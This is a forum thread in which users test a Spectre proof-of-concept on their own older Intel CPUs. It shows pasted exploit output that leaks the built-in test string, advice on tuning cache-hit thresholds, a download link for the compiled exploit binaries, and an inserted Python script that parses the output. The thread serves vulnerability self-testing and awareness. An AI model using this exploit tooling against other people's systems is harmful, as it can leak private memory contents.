Sampei.Nihira (Author) Posted January 27, 2018
25 minutes ago, Yellow Horror said:
Seems that it can't read "the secret string" on my Pentium 4:
L:\>spectre.exe
Using a cache hit threshold of 80.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001025... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001026... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001027... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001028... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001029... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102e... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000102f... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001030... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001031... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001032... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001033... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001034... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001035... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001036... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001037... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001038... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001039... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103e... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000103f... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001040... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001041... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001042... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001043... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001044... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001045... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001046... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001047... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001048... Success: 0xFF=’?’ score=0
Reading at malicious_x = 00001049... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000104a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0000104b... Success: 0xFF=’?’ score=0
Vulnerable.
Sampei.Nihira (Author) Posted January 27, 2018
My PC: W.10 1709 x64 + Microsoft Patch, Intel Dual Core E6700. Vulnerable.
UCyborg Posted January 27, 2018 (edited)
Something's fishy here, check the example output from the project's GitHub page. Don't forget you can also specify the cache hit threshold.
rloew Posted January 27, 2018
It doesn't work. I got the same result when I tried to compile the original code myself.
UCyborg Posted January 27, 2018
Here are the updated executables; there are both SSE and SSE2 versions, and the issue with garbled text has been fixed by using the more widely supported ' character instead of ’.
https://drive.google.com/open?id=1WG-62M9ZZwDXNf0xlhx6NhR-_gtDv7AC
UCyborg Posted January 27, 2018
I got the expected output with the SSE2 version by invoking it like this:
spectre-sse2.exe 100
I'm no expert, but isn't this supposed to be the kind of vulnerability that is difficult to exploit? Might take a clever hacker to put this to use in practice.
dencorso Posted January 27, 2018
Thankfully it's unreliable (and requires access to the machine) 'cause most of us won't get any fix. Here I have an i7 3770K / Z68 (2nd gen and vulnerable) on XP SP3 fully up-to-date. The SSE2 works OK, the SSE version fails. The output is below in the spoiler:
S:\>spectre-sse2 40
Using a cache hit threshold of 40.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
Reading at malicious_x = 00001028... Success: 0x4D='M' score=2
Reading at malicious_x = 00001029... Success: 0x61='a' score=2
Reading at malicious_x = 0000102a... Success: 0x67='g' score=2
Reading at malicious_x = 0000102b... Success: 0x69='i' score=2
Reading at malicious_x = 0000102c... Success: 0x63='c' score=2
Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2
Reading at malicious_x = 0000102e... Success: 0x57='W' score=2
Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2
Reading at malicious_x = 00001030... Success: 0x72='r' score=2
Reading at malicious_x = 00001031... Success: 0x64='d' score=2
Reading at malicious_x = 00001032... Success: 0x73='s' score=2
Reading at malicious_x = 00001033... Success: 0x20=' ' score=2
Reading at malicious_x = 00001034... Success: 0x61='a' score=2
Reading at malicious_x = 00001035... Success: 0x72='r' score=2
Reading at malicious_x = 00001036... Success: 0x65='e' score=2
Reading at malicious_x = 00001037... Success: 0x20=' ' score=2
Reading at malicious_x = 00001038... Success: 0x53='S' score=2
Reading at malicious_x = 00001039... Success: 0x71='q' score=2
Reading at malicious_x = 0000103a... Success: 0x75='u' score=2
Reading at malicious_x = 0000103b... Success: 0x65='e' score=2
Reading at malicious_x = 0000103c... Success: 0x61='a' score=2
Reading at malicious_x = 0000103d... Success: 0x6D='m' score=2
Reading at malicious_x = 0000103e... Success: 0x69='i' score=2
Reading at malicious_x = 0000103f... Success: 0x73='s' score=2
Reading at malicious_x = 00001040... Success: 0x68='h' score=2
Reading at malicious_x = 00001041... Success: 0x20=' ' score=2
Reading at malicious_x = 00001042... Success: 0x4F='O' score=2
Reading at malicious_x = 00001043... Success: 0x73='s' score=2
Reading at malicious_x = 00001044... Success: 0x73='s' score=2
Reading at malicious_x = 00001045... Success: 0x69='i' score=2
Reading at malicious_x = 00001046... Success: 0x66='f' score=2
Reading at malicious_x = 00001047... Success: 0x72='r' score=2
Reading at malicious_x = 00001048... Success: 0x61='a' score=2
Reading at malicious_x = 00001049... Success: 0x67='g' score=2
Reading at malicious_x = 0000104a... Success: 0x65='e' score=2
Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2
S:\>spectre-sse 40
Using a cache hit threshold of 40.
Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Unclear: 0x11='?' score=921 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001025... Unclear: 0x67='g' score=925 (second best: 0xEF='?' score=924)
Reading at malicious_x = 00001026... Unclear: 0x16='?' score=932 (second best: 0x64='d' score=918)
Reading at malicious_x = 00001027... Unclear: 0x67='g' score=923 (second best: 0x5F='_' score=918)
Reading at malicious_x = 00001028... Unclear: 0x67='g' score=917 (second best: 0x23='#' score=917)
Reading at malicious_x = 00001029... Unclear: 0x67='g' score=924 (second best: 0x21='!' score=921)
Reading at malicious_x = 0000102a... Unclear: 0x16='?' score=917 (second best: 0x39='9' score=915)
Reading at malicious_x = 0000102b... Unclear: 0x16='?' score=932 (second best: 0x11='?' score=928)
Reading at malicious_x = 0000102c... Unclear: 0x67='g' score=929 (second best: 0x64='d' score=926)
Reading at malicious_x = 0000102d... Unclear: 0xCF='?' score=934 (second best: 0x12='?' score=929)
Reading at malicious_x = 0000102e... Unclear: 0x91='?' score=918 (second best: 0x21='!' score=918)
Reading at malicious_x = 0000102f... Unclear: 0x16='?' score=916 (second best: 0xB8='?' score=914)
Reading at malicious_x = 00001030... Unclear: 0x67='g' score=922 (second best: 0x64='d' score=919)
Reading at malicious_x = 00001031... Unclear: 0x16='?' score=934 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001032... Unclear: 0x11='?' score=924 (second best: 0xCF='?' score=920)
Reading at malicious_x = 00001033... Unclear: 0x5F='_' score=926 (second best: 0x16='?' score=918)
Reading at malicious_x = 00001034... Unclear: 0x67='g' score=924 (second best: 0x16='?' score=919)
Reading at malicious_x = 00001035... Unclear: 0x7C='|' score=916 (second best: 0x11='?' score=913)
Reading at malicious_x = 00001036... Unclear: 0x11='?' score=926 (second best: 0x7C='|' score=923)
Reading at malicious_x = 00001037... Unclear: 0x11='?' score=924 (second best: 0x64='d' score=919)
Reading at malicious_x = 00001038... Unclear: 0xC3='?' score=920 (second best: 0xB8='?' score=919)
Reading at malicious_x = 00001039... Unclear: 0x5F='_' score=919 (second best: 0x11='?' score=918)
Reading at malicious_x = 0000103a... Unclear: 0x11='?' score=928 (second best: 0x7C='|' score=926)
Reading at malicious_x = 0000103b... Unclear: 0x16='?' score=924 (second best: 0x15='?' score=917)
Reading at malicious_x = 0000103c... Unclear: 0x2B='+' score=918 (second best: 0x23='#' score=917)
Reading at malicious_x = 0000103d... Unclear: 0x94='?' score=916 (second best: 0xED='?' score=914)
Reading at malicious_x = 0000103e... Unclear: 0x67='g' score=938 (second best: 0x16='?' score=923)
Reading at malicious_x = 0000103f... Unclear: 0x15='?' score=927 (second best: 0x67='g' score=925)
Reading at malicious_x = 00001040... Unclear: 0x12='?' score=938 (second best: 0x11='?' score=937)
Reading at malicious_x = 00001041... Unclear: 0x67='g' score=953 (second best: 0xEF='?' score=921)
Reading at malicious_x = 00001042... Unclear: 0x67='g' score=936 (second best: 0x15='?' score=917)
Reading at malicious_x = 00001043... Unclear: 0x23='#' score=921 (second best: 0xEF='?' score=918)
Reading at malicious_x = 00001044... Unclear: 0x11='?' score=920 (second best: 0x22='"' score=910)
Reading at malicious_x = 00001045... Unclear: 0x11='?' score=934 (second best: 0x23='#' score=931)
Reading at malicious_x = 00001046... Unclear: 0x67='g' score=929 (second best: 0x91='?' score=914)
Reading at malicious_x = 00001047... Unclear: 0xEF='?' score=917 (second best: 0x67='g' score=915)
Reading at malicious_x = 00001048... Unclear: 0x16='?' score=929 (second best: 0x11='?' score=914)
Reading at malicious_x = 00001049... Unclear: 0x5F='_' score=924 (second best: 0x23='#' score=920)
Reading at malicious_x = 0000104a... Unclear: 0xAF='?' score=929 (second best: 0x16='?' score=925)
Reading at malicious_x = 0000104b... Unclear: 0x67='g' score=935 (second best: 0x15='?' score=922)
Yellow Horror Posted January 27, 2018 (edited)
I tried the exploit on a few hardware sets and figured out:
The "SSE2" version works successfully on an i3 CPU under XP and unpatched 7 (with threshold 32 or more).
The "SSE" version starts but can't read "the secret string" anywhere, even in the vulnerable environment from the previous point (I tried some different thresholds from 40 to 1000).
The "SSE2" version doesn't work on Pentium 4 (expected, because it doesn't support SSE2) and on a Core 2 CPU that definitely supports SSE2. It exits with an error before finishing the first "reading at..." message.
MSE is angry about the SSE2 version.
UCyborg Posted January 27, 2018 (edited)
I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize the RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string). Wondering if there's a CPU out there that would work with the SSE version, or if there's something off in the code, or maybe the exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs. Supposedly there are certain x86-only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?).
Sampei.Nihira (Author) Posted January 27, 2018
32 minutes ago, UCyborg said:
I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize the RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string). Wondering if there's a CPU out there that would work with the SSE version, or if there's something off in the code, or maybe the exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs. Supposedly there are certain x86-only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?).
Run simultaneously on the same PC:
The one below is unreliable.
Pentium Dual Core E6700, W.10 1709 x64:
Yellow Horror Posted January 27, 2018 (edited)
51 minutes ago, UCyborg said:
I compiled 2 more versions
"SSE2 w/o RDTSCP" can't read "the secret string" on i3 with any threshold I try.
"SSE2 w/o RDTSCP" on Core 2 gives me some (very unstable) results (a few letters of the "secret string" in their right positions, garbage in the other positions) with the default threshold. With any threshold I try to enter manually it gives complete garbage.
Both "SSE" versions don't read "the string" on i3.
"SSE+RDTSCP" doesn't work on Core 2.
For now it seems that Core 2 and older CPUs are invulnerable to this realization of the exploit, but may be vulnerable to a better-crafted one (due to the partial success of the "SSE2 w/o RDTSCP" version on Core 2). This is bad news, I think.
UCyborg Posted January 27, 2018 (edited)
27 minutes ago, Sampei.Nihira said:
The one below is unreliable.
You need to get a result like this:
Using a cache hit threshold of 90.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Success: 0x65='e' score=2
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
Reading at malicious_x = 00001028... Success: 0x4D='M' score=2
Reading at malicious_x = 00001029... Success: 0x61='a' score=2
Reading at malicious_x = 0000102a... Success: 0x67='g' score=2
Reading at malicious_x = 0000102b... Success: 0x69='i' score=2
Reading at malicious_x = 0000102c... Success: 0x63='c' score=2
Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2
Reading at malicious_x = 0000102e... Success: 0x57='W' score=2
Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2
Reading at malicious_x = 00001030... Success: 0x72='r' score=2
Reading at malicious_x = 00001031... Success: 0x64='d' score=2
Reading at malicious_x = 00001032... Success: 0x73='s' score=2
Reading at malicious_x = 00001033... Success: 0x20=' ' score=2
Reading at malicious_x = 00001034... Success: 0x61='a' score=2
Reading at malicious_x = 00001035... Success: 0x72='r' score=2
Reading at malicious_x = 00001036... Success: 0x65='e' score=2
Reading at malicious_x = 00001037... Success: 0x20=' ' score=2
Reading at malicious_x = 00001038... Success: 0x53='S' score=2
Reading at malicious_x = 00001039... Success: 0x71='q' score=2
Reading at malicious_x = 0000103a... Success: 0x75='u' score=2
Reading at malicious_x = 0000103b... Success: 0x65='e' score=2
Reading at malicious_x = 0000103c... Success: 0x61='a' score=2
Reading at malicious_x = 0000103d... Success: 0x6D='m' score=7 (second best: 0x29=')' score=1)
Reading at malicious_x = 0000103e... Success: 0x69='i' score=2
Reading at malicious_x = 0000103f... Success: 0x73='s' score=2
Reading at malicious_x = 00001040... Success: 0x68='h' score=2
Reading at malicious_x = 00001041... Success: 0x20=' ' score=2
Reading at malicious_x = 00001042... Success: 0x4F='O' score=2
Reading at malicious_x = 00001043... Success: 0x73='s' score=2
Reading at malicious_x = 00001044... Success: 0x73='s' score=2
Reading at malicious_x = 00001045... Success: 0x69='i' score=2
Reading at malicious_x = 00001046... Success: 0x66='f' score=2
Reading at malicious_x = 00001047... Success: 0x72='r' score=2
Reading at malicious_x = 00001048... Success: 0x61='a' score=2
Reading at malicious_x = 00001049... Success: 0x67='g' score=2
Reading at malicious_x = 0000104a... Success: 0x65='e' score=2
Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2
Read "The Magic Words are Squeamish Ossifrage." vertically. If you got something else, then it didn't work. You may also need to change the cache hit threshold value by invoking the program like this:
spectre-sse2.exe 90
Try some values between 40 - 300 for example.
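Reading those 40 lines "vertically" by eye works once, but the thread compares many runs across thresholds and builds. The script below is an added example (not part of the thread, the spectre.c proof of concept, or any of the posted binaries) that parses the PoC's printed output, the "Using a cache hit threshold" line, the "Build:" feature flags and each Success/Unclear read, and reports how much of the expected test string was recovered. It only consumes output; it performs no cache timing itself. The two sample outputs embedded in it are constructed to match the format pasted above (one is flattened onto a single line the way the forum software does), and the hint text is this example's own reading of the scores: a score of 0 means no access fell under the threshold, while every candidate scoring in the 900s means nothing is distinguishable.

```python
"""Parse spectre.c PoC output and judge whether a run recovered the test string."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# The PoC's built-in test string, which the thread says must be read vertically.
EXPECTED_SECRET = "The Magic Words are Squeamish Ossifrage."

# Constructed sample: three confident reads plus one Unclear read with a second-best
# candidate (the non-printable byte 0x16 is printed as '?' by the PoC).
SAMPLE_OUTPUT = """\
Using a cache hit threshold of 40.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
Reading 40 bytes:
Reading at malicious_x = 00001024... Success: 0x54='T' score=2
Reading at malicious_x = 00001025... Success: 0x68='h' score=2
Reading at malicious_x = 00001026... Unclear: 0x16='?' score=932 (second best: 0x65='e' score=918)
Reading at malicious_x = 00001027... Success: 0x20=' ' score=2
"""

# Constructed sample of a run that measured nothing, flattened onto one line the way
# the forum pastes it, with the curly quotes the first build printed.
SAMPLE_NO_SIGNAL = (
    "Using a cache hit threshold of 80. Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED "
    "CLFLUSH_NOT_SUPPORTED Reading 40 bytes: Reading at malicious_x = 00001024... "
    "Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001025... Success: 0xFF=’?’ score=0"
)


@dataclass
class Read:
    addr: int              # value of malicious_x for this read
    verdict: str           # "Success" or "Unclear", exactly as the PoC printed it
    byte: int              # best-guess byte value (authoritative; the quoted char may be '?')
    score: int
    second_byte: Optional[int] = None
    second_score: Optional[int] = None


@dataclass
class Report:
    threshold: Optional[int] = None
    features: Dict[str, bool] = field(default_factory=dict)   # e.g. {"RDTSCP": True}
    reads: List[Read] = field(default_factory=list)


THRESHOLD_RE = re.compile(r"Using a cache hit threshold of (\d+)")
BUILD_RE = re.compile(r"Build:((?:\s+\w+_(?:NOT_)?SUPPORTED)+)")
# Accepts both ' and ’ around the printed character, and any whitespace after "...".
READ_RE = re.compile(
    r"Reading at malicious_x = (?P<addr>[0-9a-fA-F]+)\.\.\.\s*"
    r"(?P<verdict>Success|Unclear): 0x(?P<byte>[0-9A-Fa-f]{2})=['’].['’] score=(?P<score>\d+)"
    r"(?: \(second best: 0x(?P<byte2>[0-9A-Fa-f]{2})=['’].['’] score=(?P<score2>\d+)\))?"
)


def parse_report(text: str) -> Report:
    """Extract threshold, build feature flags and every read from pasted PoC output."""
    report = Report()
    m = THRESHOLD_RE.search(text)
    if m:
        report.threshold = int(m.group(1))
    m = BUILD_RE.search(text)
    if m:
        for token in m.group(1).split():
            name, _, status = token.partition("_")      # "CLFLUSH_NOT_SUPPORTED" -> CLFLUSH, False
            report.features[name] = status == "SUPPORTED"
    for m in READ_RE.finditer(text):
        report.reads.append(Read(
            addr=int(m["addr"], 16), verdict=m["verdict"], byte=int(m["byte"], 16),
            score=int(m["score"]),
            second_byte=int(m["byte2"], 16) if m["byte2"] else None,
            second_score=int(m["score2"]) if m["score2"] else None,
        ))
    return report


def recovered_string(report: Report) -> str:
    """Lay the best-guess bytes out by address, i.e. the 'vertical' reading done by hand."""
    if not report.reads:
        return ""
    base = min(r.addr for r in report.reads)
    out = ["?"] * (max(r.addr for r in report.reads) - base + 1)
    for r in report.reads:
        out[r.addr - base] = chr(r.byte) if 32 <= r.byte < 127 else "?"
    return "".join(out)


def assess(report: Report, expected: str = EXPECTED_SECRET) -> Dict[str, object]:
    """Compare the run against the expected string and explain a failure in plain terms."""
    got = recovered_string(report)
    matched = sum(1 for i, ch in enumerate(got) if i < len(expected) and ch == expected[i])
    unclear = sum(r.verdict == "Unclear" for r in report.reads)
    no_signal = sum(r.score == 0 for r in report.reads)
    total = len(report.reads)
    if total == 0:
        verdict = "no reads parsed"
    elif total == len(expected) and matched == total:
        verdict = "reproduced"
    elif matched == 0:
        verdict = "not reproduced"
    else:
        verdict = "partial"
    hints: List[str] = []
    missing = [k for k, v in report.features.items() if not v]
    if missing:
        hints.append("build runs without " + "/".join(missing) + "; results from such builds "
                     "were unreliable at best in this thread")
    if total and no_signal == total:
        hints.append("every read scored 0: no access fell under the threshold, try raising it")
    elif total and unclear == total:
        hints.append("every read is Unclear: candidates are indistinguishable, try lowering the threshold")
    return {"threshold": report.threshold, "recovered": got, "matched": matched,
            "unclear": unclear, "no_signal": no_signal, "total": total,
            "verdict": verdict, "hints": hints}


if __name__ == "__main__":
    for sample in (SAMPLE_OUTPUT, SAMPLE_NO_SIGNAL):
        print(assess(parse_report(sample)))
```

Feed it a whole pasted run (including the "Build:" line) and compare the "matched" count across thresholds rather than eyeballing 40 lines per attempt; the second-best byte and score are kept per read so near-ties like the 917/917 lines in the SSE run above can be spotted programmatically.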
Sampei.Nihira (Author) Posted January 28, 2018 (edited)
I cannot make this work with the Pentium Dual Core E6700. The characters for each cache (20-400) value are always "?". Can I start both spectre-sse.exe and spectre-sse2.exe?
________________________________________________
On the PC with XP (Pentium Celeron M380) it works without setting up the cache value. File Spectre-sse2.exe (and pause):
wyxchari Posted February 2, 2018 (edited)
22 hours ago, Sampei.Nihira said:
Intel Celeron M380 with FSB: Vulnerable to Spectre.
Pentium Dual Core E6700 with FSB: Vulnerable to Spectre.
You're right. According to this very reliable article, they are affected from the Pentium Pro (1995):
https://disruptiveludens.wordpress.com/2018/01/05/meltdown-y-spectre/
Intel processors affected in all variants: Pentium Pro, Pentium II, Pentium III, Pentium 4, Pentium D, Pentium M, Core 2 Duo, Core 2 Quad, ...
And it continues with the expanded official list that Intel published:
https://www.techarp.com/guides/complete-meltdown-spectre-cpu-list/
Not affected: Atom before 2013, Itanium.
Sampei.Nihira (Author) Posted February 2, 2018 (edited)
Correct. The Pentium Pro is the first processor to use speculative execution.
Quote: "...The Pentium Pro thus featured out of order execution, including speculative execution..."
https://en.wikipedia.org/wiki/Pentium_Pro